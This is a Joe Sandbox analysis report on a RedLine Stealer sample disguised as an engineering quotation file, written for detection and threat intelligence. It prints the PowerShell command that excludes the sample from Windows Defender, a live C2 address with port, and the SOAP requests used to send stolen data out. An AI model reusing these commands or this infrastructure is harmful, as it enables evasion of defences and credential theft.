Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_TFS-1508-AL NASR ENGINEERING.exe

Overview

General Information

Sample name:RFQ_TFS-1508-AL NASR ENGINEERING.exe
Analysis ID:1557873
MD5:51e2a4cf52a06bff7b50826173d6a0ad
SHA1:d5450d3259df08a3d0c0a0b91b586e8532fab2e0
SHA256:7087a8601eecc0ad79246fe0eb6cb2e9562b510495281dfe4c6df888b2b22b43
Tags:exeRedLineStealeruser-threatcat_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Disables UAC (registry)
Found many strings related to Crypto-Wallets (likely being stolen)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ_TFS-1508-AL NASR ENGINEERING.exe (PID: 5276 cmdline: "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" MD5: 51E2A4CF52A06BFF7B50826173D6A0AD)
    • powershell.exe (PID: 6508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • CasPol.exe (PID: 3168 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CasPol.exe (PID: 7140 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • WerFault.exe (PID: 3648 cmdline: C:\Windows\system32\WerFault.exe -u -p 5276 -s 1056 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["193.70.111.186:13484"], "Bot Id": "hyce"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x2be8a:$a4: get_ScannedWallets
          • 0x43cd2:$a4: get_ScannedWallets
          • 0x2ace8:$a5: get_ScanTelegram
          • 0x42b30:$a5: get_ScanTelegram
          • 0x2bb0e:$a6: get_ScanGeckoBrowsersPaths
          • 0x43956:$a6: get_ScanGeckoBrowsersPaths
          • 0x2992a:$a7: <Processes>k__BackingField
          • 0x41772:$a7: <Processes>k__BackingField
          • 0x2783c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x3f684:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x2925e:$a9: <ScanFTP>k__BackingField
          • 0x410a6:$a9: <ScanFTP>k__BackingField
          00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 11 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x135ca:$a4: get_ScannedWallets
                  • 0x12428:$a5: get_ScanTelegram
                  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1106a:$a7: <Processes>k__BackingField
                  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1099e:$a9: <ScanFTP>k__BackingField
                  0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1048a:$u7: RunPE
                  • 0x13b41:$u8: DownloadAndEx
                  • 0x9130:$pat14: , CommandLine:
                  • 0x13079:$v2_1: ListOfProcesses
                  • 0x1068b:$v2_2: get_ScanVPN
                  • 0x1072e:$v2_2: get_ScanFTP
                  • 0x1141e:$v2_2: get_ScanDiscord
                  • 0x1240c:$v2_2: get_ScanSteam
                  • 0x12428:$v2_2: get_ScanTelegram
                  • 0x124ce:$v2_2: get_ScanScreen
                  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13509:$v2_2: get_ScanBrowsers
                  • 0x135ca:$v2_2: get_ScannedWallets
                  • 0x135f0:$v2_2: get_ScanWallets
                  • 0x13610:$v2_3: GetArguments
                  • 0x11cd9:$v2_4: VerifyUpdate
                  • 0x165ea:$v2_4: VerifyUpdate
                  • 0x139ca:$v2_5: VerifyScanRequest
                  • 0x130c6:$v2_6: GetUpdates
                  • 0x165cb:$v2_6: GetUpdates
                  5.2.CasPol.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe", ParentImage: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe, ParentProcessId: 5276, ParentProcessName: RFQ_TFS-1508-AL NASR ENGINEERING.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, ProcessId: 6508, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe", ParentImage: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe, ParentProcessId: 5276, ParentProcessName: RFQ_TFS-1508-AL NASR ENGINEERING.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, ProcessId: 6508, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe", ParentImage: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe, ParentProcessId: 5276, ParentProcessName: RFQ_TFS-1508-AL NASR ENGINEERING.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force, ProcessId: 6508, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T17:34:08.091098+010020450001Malware Command and Control Activity Detected193.70.111.18613484192.168.2.549704TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T17:34:11.786245+010020460561A Network Trojan was detected193.70.111.18613484192.168.2.549704TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T17:34:11.786245+010020450011Malware Command and Control Activity Detected193.70.111.18613484192.168.2.549704TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T17:34:02.747716+010028496621Malware Command and Control Activity Detected192.168.2.549704193.70.111.18613484TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T17:34:08.431819+010028493511Malware Command and Control Activity Detected192.168.2.549704193.70.111.18613484TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T17:34:14.203778+010028482001Malware Command and Control Activity Detected192.168.2.549717193.70.111.18613484TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T17:34:12.872627+010028493521Malware Command and Control Activity Detected192.168.2.549714193.70.111.18613484TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["193.70.111.186:13484"], "Bot Id": "hyce"}
                    Multi AV Scanner detection for submitted file
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeReversingLabs: Detection: 48%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb@H`h source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdbH source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbW source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49704 -> 193.70.111.186:13484
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 193.70.111.186:13484 -> 192.168.2.5:49704
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49714 -> 193.70.111.186:13484
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49704 -> 193.70.111.186:13484
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49717 -> 193.70.111.186:13484
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 193.70.111.186:13484 -> 192.168.2.5:49704
                    Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 193.70.111.186:13484 -> 192.168.2.5:49704
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 193.70.111.186:13484
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 13484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 13484 -> 49717
                    Source: global trafficTCP traffic: 192.168.2.5:49704 -> 193.70.111.186:13484
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 193.70.111.186:13484Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 193.70.111.186:13484Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 193.70.111.186:13484Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettings xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 193.70.111.186:13484Content-Length: 35640Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 193.70.111.186:13484Content-Length: 35632Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 193.70.111.186 193.70.111.186
                    Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.70.111.186
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 193.70.111.186:13484Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.70.111.186:13484
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.70.111.186:13484/
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.70.111.186:13484pE
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.70.111.186:13484t-
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002C3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: CasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
